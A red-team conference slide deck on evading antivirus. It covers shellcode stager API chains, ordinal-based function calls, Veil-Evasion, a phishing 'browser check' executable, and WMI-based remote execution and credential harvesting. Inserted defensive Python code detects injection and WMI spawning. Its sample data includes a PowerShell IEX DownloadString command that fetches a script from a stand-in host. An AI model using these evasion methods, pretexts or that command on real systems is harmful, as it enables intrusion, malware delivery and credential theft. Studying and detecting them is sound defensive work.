A Battle Against the Industry - Beating Antivirus for Meterpreter and More


This talk goes over how stagers work in a different manner. Rather than standard function calls, I show how to utilize the same functionality in a slightly different way. It talks about Veil-Evasion, and a signature that was developed for it. Finally, I get into custom code and showcase three pieces of custom code that completely bypass antivirus.


  1. A Battle Against the Industry - Beating Antivirus for Meterpreter and More @ChrisTruncer
  2. Whoami ■ A systems administrator turned red teamer ■ Florida State Seminole ■ Open Source Software Developer ■ Veil-Framework ■ EyeWitness (Thanks Robin :)) ■ Egress-Assess ■ Just-Metadata
  3. Why am I here today? ■ Share some laughs at Antivirus :) ■ Give a background on stagers ■ Showcase a Veil-Evasion signature bypass ■ Anyone can do this.. ■ Talk about developing your own code ■ Case studies on previously developed code
  4. Stagers
  5. What are stagers? ■ Can be referred to as “stage 1” ■ Might be msfvenom, Veil-Evasion, etc. output ■ Goal is typically to inject shellcode into memory ■ Shellcode usually downloads and executes a reflectively injectable DLL ■ …but it can also do anything you want if you write it :)
  6. What are stagers? ■ Stagers are really used as loaders for your real malware ■ They’re designed to be expendable and tiny ■ Don’t give away your engineered malware by dropping it to disk ■ Load everything in memory
  7. What are stagers? ■ Any language that has the ability to access Windows functions can be used to write a stager! ■ Pretty cool, and allows us to expand out from traditional “Windows Languages” ■ Interacting with Windows functions can seem daunting, but isn’t all that bad ■ 4 or 5 function calls
  8. Function Calls
  9. Stagers in a Nutshell ■ Allocate memory to store the shellcode being injected, and apply proper memory permissions ■ Copy the shellcode into the allocated memory ■ Create a thread to run the shellcode copied into the process’s memory ■ Wait for the thread to complete running before exiting the program
  10. Windows API Calls ■ Most stagers utilize VirtualAlloc to allocate memory ■ This talk shows an alternate way to allocate memory that isn’t heavily utilized ■ It might be a better way to fly under the radar
  11. HeapCreate ■ Creates a private heap object that can be used by the process creating the heap ■ Specify the memory protections ■ Requires the size of the heap that will need to be allocated ■ Shellcode length ■ Max size of allocated memory ■ I do twice the shellcode length
  12. HeapAlloc ■ Allocates memory from the previously created heap object ■ Receives a handle to the previously created heap object ■ Specify the total amount of space that you are allocating for shellcode
  13. RtlMoveMemory ■ Places the shellcode you are injecting into the allocated heap space ■ Needs a pointer to where the data (shellcode) will be copied to (the HeapAlloc output) ■ Needs a pointer to the data (shellcode) ■ Needs the length of the shellcode being injected
  14. CreateThread ■ This function creates a new thread within the current process to execute the data (shellcode) that was injected ■ Requires a pointer to the data (shellcode) that will run in the new thread ■ Schedule the thread to execute immediately
  15. WaitForSingleObject ■ This function is like a blocking call to prevent the program from exiting immediately ■ Requires a handle to the thread that was created by the CreateThread function ■ Requires a value (-1) to specify that the program should wait to exit until the thread exits
  16. Stagers in a Nutshell (Repeated) ■ Allocate memory to store the shellcode being injected, and apply proper memory permissions ■ Copy the shellcode into the allocated memory ■ Create a thread to run the shellcode copied into the process’s memory ■ Wait for the thread to complete running before exiting the program
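An added example, not code from the talk: a Python detection heuristic for the allocation chain the stager slides describe, run over a constructed sandbox-style API trace. It tracks memory the process itself made executable (HeapCreate with HEAP_CREATE_ENABLE_EXECUTE followed by HeapAlloc from that heap, and, going one step beyond the slides, the classic VirtualAlloc with PAGE_EXECUTE_READWRITE), records when a memory copy writes into that region, and flags any CreateThread whose start address lies inside it. The trace layout, addresses and handles are constructed for the example; the three flag constants are the Windows SDK values.

```python
# Flag values from the Windows SDK (heapapi.h / winnt.h / synchapi.h).
HEAP_CREATE_ENABLE_EXECUTE = 0x00040000   # HeapCreate flOptions: heap pages are executable
PAGE_EXECUTE_READWRITE = 0x40             # VirtualAlloc flProtect: the classic RWX allocation
INFINITE = 0xFFFFFFFF                     # WaitForSingleObject timeout (-1 as a DWORD)

# Constructed sandbox-style trace: (api, arguments, return value). Addresses and
# handles are made up; the call order mirrors the heap-based stager on the slides.
SAMPLE_TRACE = [
    ("HeapCreate", {"flOptions": HEAP_CREATE_ENABLE_EXECUTE,
                    "dwInitialSize": 0x200, "dwMaximumSize": 0x400}, 0x5A0000),
    ("HeapAlloc", {"hHeap": 0x5A0000, "dwFlags": 0, "dwBytes": 0x200}, 0x5A0710),
    ("RtlMoveMemory", {"Destination": 0x5A0710, "Source": 0x40A000, "Length": 0x200}, None),
    ("CreateThread", {"lpStartAddress": 0x5A0710, "dwCreationFlags": 0}, 0x1F4),
    ("WaitForSingleObject", {"hHandle": 0x1F4, "dwMilliseconds": INFINITE}, 0),
]

# Constructed benign trace: a read/write buffer and a thread that starts in the
# program's own code (0x401000 is an ordinary image address here, not heap memory).
BENIGN_TRACE = [
    ("VirtualAlloc", {"lpAddress": 0, "dwSize": 0x1000,
                      "flAllocationType": 0x3000, "flProtect": 0x04}, 0x6B0000),
    ("RtlMoveMemory", {"Destination": 0x6B0000, "Source": 0x40A000, "Length": 0x100}, None),
    ("CreateThread", {"lpStartAddress": 0x401000, "dwCreationFlags": 0}, 0x200),
]


def find_injected_threads(trace):
    """Return one finding per thread started inside memory that the traced
    process made executable itself, noting whether data was copied into it."""
    exec_heaps = set()   # handles returned by HeapCreate with the execute flag
    regions = []         # executable regions: start, end, origin, written
    findings = []
    for api, args, ret in trace:
        if api == "HeapCreate" and ret and args.get("flOptions", 0) & HEAP_CREATE_ENABLE_EXECUTE:
            exec_heaps.add(ret)
        elif api == "VirtualAlloc" and ret and args.get("flProtect") == PAGE_EXECUTE_READWRITE:
            regions.append({"start": ret, "end": ret + args["dwSize"],
                            "origin": "VirtualAlloc(PAGE_EXECUTE_READWRITE)", "written": False})
        elif api == "HeapAlloc" and ret and args.get("hHeap") in exec_heaps:
            regions.append({"start": ret, "end": ret + args["dwBytes"],
                            "origin": "HeapAlloc from a HEAP_CREATE_ENABLE_EXECUTE heap",
                            "written": False})
        elif api in ("RtlMoveMemory", "memcpy"):
            dst = args.get("Destination")
            for region in regions:
                if region["start"] <= dst < region["end"]:
                    region["written"] = True
        elif api == "CreateThread":
            start = args.get("lpStartAddress")
            for region in regions:
                if region["start"] <= start < region["end"]:
                    findings.append({"origin": region["origin"], "start": start,
                                     "written": region["written"]})
    return findings


if __name__ == "__main__":
    for finding in find_injected_threads(SAMPLE_TRACE):
        print(f"thread at {finding['start']:#x} in {finding['origin']}, "
              f"data copied in: {finding['written']}")
    print("benign trace findings:", find_injected_threads(BENIGN_TRACE))
```

Swapping VirtualAlloc for HeapCreate changes the imported name, which is what defeats a string signature, but not what a dynamic trace records: pages became executable, bytes were copied in, and a thread started there. That is why the check keys on the property of the region rather than on the API name.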
  17. Ordinal Values
  18. Ordinal Values ■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection ■ Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list ■ Same concept for bypassing AV via ordinal values
  19. Ordinal Values ■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value? ■ This is still a call to the same function, but just via a different method ■ Check out this code
  20. Ordinal Values ■ Simply referencing function calls by their ordinal value vs. name can bypass anti-virus ■ NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value. ■ So…. how do we find these ordinal values?
  21. Ordinal Values ■ PEView is a free program which lets you inspect PE files, DLLs, etc. ■ You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value ■ PEView provides the base 16 value, so be sure to convert it to its base 10 value.
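An added example, not code from the talk or from Veil-Evasion: a small Python parser for a PE export directory that returns the ordinal-to-name mapping, which is what an analyst needs when a sample resolves kernel32 functions by ordinal instead of by name, and which is the same lookup the slides do by hand in PEView. It also makes the slide's caveat concrete: the mapping is whatever the export table of that particular DLL build says. Because it has to run offline, the block builds a constructed, minimal PE32+ image with a made-up export table; the DLL name, the ordinal base and the ordinals assigned to HeapAlloc, HeapCreate and RtlMoveMemory are invented for the test and are not kernel32's real values.

```python
import struct


def _rva_to_offset(rva, sections):
    """Map a relative virtual address to a file offset via the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError(f"RVA {rva:#x} is not inside any section")


def _cstring(data, off):
    return data[off:data.index(b"\x00", off)].decode("ascii")


def parse_exports(data):
    """Return {ordinal: name} for a PE file; ordinal-only exports map to None."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad NT signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    data_dir = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+
    exp_rva, _exp_size = struct.unpack_from("<II", data, data_dir)  # entry 0 = EXPORT
    sections = []
    sec_tbl = opt + size_opt
    for i in range(num_sections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, sec_tbl + 40 * i + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    if exp_rva == 0:
        return {}
    exp = _rva_to_offset(exp_rva, sections)
    # IMAGE_EXPORT_DIRECTORY from offset 16: Base, NumberOfFunctions, NumberOfNames,
    # AddressOfFunctions, AddressOfNames, AddressOfNameOrdinals
    base, n_funcs, n_names, funcs_rva, names_rva, ords_rva = struct.unpack_from("<IIIIII", data, exp + 16)
    exports = {}
    funcs_off = _rva_to_offset(funcs_rva, sections)
    for i in range(n_funcs):
        if struct.unpack_from("<I", data, funcs_off + 4 * i)[0]:
            exports[base + i] = None          # present but (so far) nameless
    names_off = _rva_to_offset(names_rva, sections)
    ords_off = _rva_to_offset(ords_rva, sections)
    for i in range(n_names):
        name_rva = struct.unpack_from("<I", data, names_off + 4 * i)[0]
        index = struct.unpack_from("<H", data, ords_off + 2 * i)[0]  # unbiased index
        exports[base + index] = _cstring(data, _rva_to_offset(name_rva, sections))
    return exports


def ordinal_of(exports, name):
    """Reverse lookup: the ordinal a name has in this DLL build."""
    for ordinal, export_name in exports.items():
        if export_name == name:
            return ordinal
    raise KeyError(name)


def build_sample_dll():
    """Construct a minimal PE32+ image containing only an export directory.
    Constructed test data: the ordinals here are made up, not kernel32's."""
    base = 5
    functions = ["HeapAlloc", "HeapCreate", None, "RtlMoveMemory"]  # None = ordinal-only
    sect_rva, sect_off = 0x1000, 0x200
    body = bytearray(40)                                   # directory, filled below
    funcs_tbl = sect_rva + len(body)
    body += b"".join(struct.pack("<I", 0x2000 + 0x10 * i) for i in range(len(functions)))
    named = [(i, n) for i, n in enumerate(functions) if n is not None]
    names_tbl, names_pos = sect_rva + len(body), len(body)
    body += b"\x00" * (4 * len(named))                     # name RVAs, patched below
    ords_tbl = sect_rva + len(body)
    body += b"".join(struct.pack("<H", i) for i, _ in named)
    dll_name_rva = sect_rva + len(body)
    body += b"sample.dll\x00"
    for k, (_, name) in enumerate(named):
        struct.pack_into("<I", body, names_pos + 4 * k, sect_rva + len(body))
        body += name.encode("ascii") + b"\x00"
    struct.pack_into("<IIHHIIIIIII", body, 0, 0, 0, 0, 0, dll_name_rva, base,
                     len(functions), len(named), funcs_tbl, names_tbl, ords_tbl)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                  # PE32+ magic
    struct.pack_into("<II", opt, 112, sect_rva, len(body))  # DataDirectory[EXPORT]
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, len(opt), 0x2022)
    section = (b".edata".ljust(8, b"\x00")
               + struct.pack("<IIII", len(body), sect_rva, len(body), sect_off) + b"\x00" * 16)
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)
    headers = dos + b"PE\x00\x00" + coff + opt + section
    return bytes(headers.ljust(sect_off, b"\x00") + body)


if __name__ == "__main__":
    for ordinal, name in sorted(parse_exports(build_sample_dll()).items()):
        print(f"{ordinal:#06x} ({ordinal:4d})  {name or '<ordinal only>'}")
```

The ordinals come back as integers, so a hex value read off a PEView screen is looked up as `exports[0x6]` rather than converted by hand. Run against two different kernel32.dll builds, the same name can come back with different ordinals, which is exactly why an import resolved by ordinal in a sample only means something against the export table of the DLL version that sample was built for.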
  22. Veil’s Approach
  23. How Veil-Evasion Bypasses AV ■ Completely open sourced ■ Can query VT’s API ■ Veil-Evasion attempts to bypass AV through a few different techniques ■ Obfuscated Code ■ Encrypted Code ■ Non-standard languages for binaries (Flat vs. encrypted code)
  24. How Veil-Evasion Bypasses AV ■ Languages that Veil-Evasion supports ■ Python ■ Perl ■ PowerShell ■ C# ■ C ■ Go ■ Ruby
  25. How Veil-Evasion Bypasses AV ■ Using a non-standard language (read: not C, C++, or C#) resulted in payloads that immediately bypassed antivirus ■ AV just didn’t understand how to properly inspect these executables ■ Example: ■ C Flat vs. Python Flat
  26. Ordinal Values ■ Simply changing the language the payload was written in completely bypassed all AV signatures.
  27. Antivirus Signature
  28. Veil-Evasion ■ After about 1 year, Veil-Evasion finally had its first signature! ■ I was informed about this on IRC and wanted to check it out.
  29. Custom Code
  30. Browser Check Scenario ■ Instead of sending just some random executable when phishing, what if you promise to secure their system? ■ Developed by Hunter Hardman (@t3ntman) ■ Written in C# ■ Custom code, so it bypasses every single AV out there (at least before Hunter made it public :))
  31. Browser Check Scenario ■ This works great for phishing scenarios ■ We target individuals impersonating their IT Security, or just IT staff ■ Warn them about the dangers of misconfigured/old browsers ■ Give them a solution!
  32. Browser Check Scenario ■ Once the program starts, it spawns PowerShell and executes any code you give it ■ Meterpreter or Beacon! ■ It’s fully functional: once the user tells it to start, they see a progress bar go to completion. ■ Once complete, it lets them know their system is secure!
  33. Browser Check Scenario ■ Delivery is dependent upon the situation ■ We’ve created websites hosting it over HTTPS to make users think it is secure ■ Created fake “secure file transfer” websites ■ Rarely, we’ve sent just the executable ■ For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program
  34. Browser Check Scenario ■ Currently available for review at -
  35. Enumerator
  36. Enumerator ■ Customer didn’t want actual shellcode injection or infection of their endpoints ■ Wanted intel collection to act as proof of “compromise” ■ I developed a script that would gather host information and would POST the data out over HTTPS to our server.
  37. Enumerator ■ Information gathered ■ System hostname ■ IP address(es) ■ System drives and drive space ■ Current user ■ Tasklist
  38. Github ■ s/blob/master/ ■ s/blob/master/
  39. WMIOps
  40. WMIOps ■ Why waste engineering time developing a RAT, hoping it never gets burnt? Just leverage built-in functionality! ■ Anything useful for system administration is just as easily repurposed for illegitimate use :) ■ Just live off the land!
  41. WMIOps ■ Used WMI much? ■ WMI is installed and running by default on Windows systems since Windows 2000 ■ It does require local admin privileges on the targeted system. But this can make it great for post-exploitation
  42. WMIOps ■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems. ■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks
  43. WMIOps ■ Want to see which users have active processes on a system? ■ Might be good to know where you can snag creds! ■ Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!
  44. WMIOps ■ Now that we know who is on the system, want to run Mimikatz to capture user credentials? ■ Traditionally we’d have to compromise it, and load up Mimikatz. ■ Why not leverage WMI to do everything in memory without needing the use of a RAT?
  45. WMIOps ■ Invoke-RemoteScriptWithOutput ■ Spawn PowerShell on the remote system ■ Download the PowerShell script in memory ■ Runs the user specified function ■ Saves output ■ Performs a POST over HTTPS to a user specified IP address
  46. WMIOps ■ WMIOps can do other tasks as well ■ Run commands ■ Kill processes ■ Search for files ■ Transfer files ■ Etc. ■ Available here -
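An added example, not part of WMIOps or of the talk: the host-side telemetry footprint of the remote-execution pattern on the WMIOps slides. A process created remotely through WMI runs as a child of the WMI provider host, WmiPrvSE.exe, so a process-creation event whose parent is WmiPrvSE.exe and whose child is a shell interpreter is the detection hook, and a command line that pulls a script into memory or carries an encoded command raises the score further. The events below are constructed in the shape of Sysmon Event ID 1 fields; the user names, paths and the 203.0.113.5 address are made up.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 field names). Not real
# telemetry: users, paths and the 203.0.113.5 host are invented for the example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://203.0.113.5/f.ps1')\"",
     "User": "CORP\\jdoe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1",
     "User": "CORP\\admin"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c tasklist > C:\\Windows\\Temp\\t.txt",
     "User": "NT AUTHORITY\\SYSTEM"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "User": "NT AUTHORITY\\SYSTEM"},
]

# Parent of every process created through WMI's Win32_Process class.
WMI_PROVIDER_HOST = re.compile(r"\\wbem\\WmiPrvSE\.exe$", re.IGNORECASE)
SHELL_INTERPRETER = re.compile(r"\\(powershell|pwsh|cmd)\.exe$", re.IGNORECASE)
# Script pulled into memory, or an encoded command, on the child's command line.
INMEMORY_LOADER = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Invoke-Expression"
    r"|\bIEX\b|-e(nc(odedcommand)?)?\b", re.IGNORECASE)


def score_event(event):
    """Return (score, reasons) for one process-creation event."""
    score, reasons = 0, []
    if WMI_PROVIDER_HOST.search(event["ParentImage"]):
        score += 2
        reasons.append("parent is WmiPrvSE.exe (process created through WMI)")
        if SHELL_INTERPRETER.search(event["Image"]):
            score += 2
            reasons.append("WMI-spawned child is a shell interpreter")
    if INMEMORY_LOADER.search(event["CommandLine"]):
        score += 3
        reasons.append("command line loads code from the network or an encoded blob")
    return score, reasons


def find_suspicious(events, threshold=4):
    """Return (index, score, reasons) for every event at or above the threshold."""
    hits = []
    for idx, event in enumerate(events):
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((idx, score, reasons))
    return hits


if __name__ == "__main__":
    for idx, score, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx} score {score}: {SAMPLE_EVENTS[idx]['CommandLine']}")
        for reason in reasons:
            print("   -", reason)
```

Loading the tool in memory keeps it off disk, as the slides say, but the WMI path still has to create a process on the target, and that creation is logged with WmiPrvSE.exe as the parent. Scoring the parent/child pair and the command line separately keeps an administrator's WMI-launched inventory script below the threshold while a shell spawned by WMI that then reaches out for code clears it comfortably.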
  47. Thanks! Any questions? Reach out to me! ■ @ChrisTruncer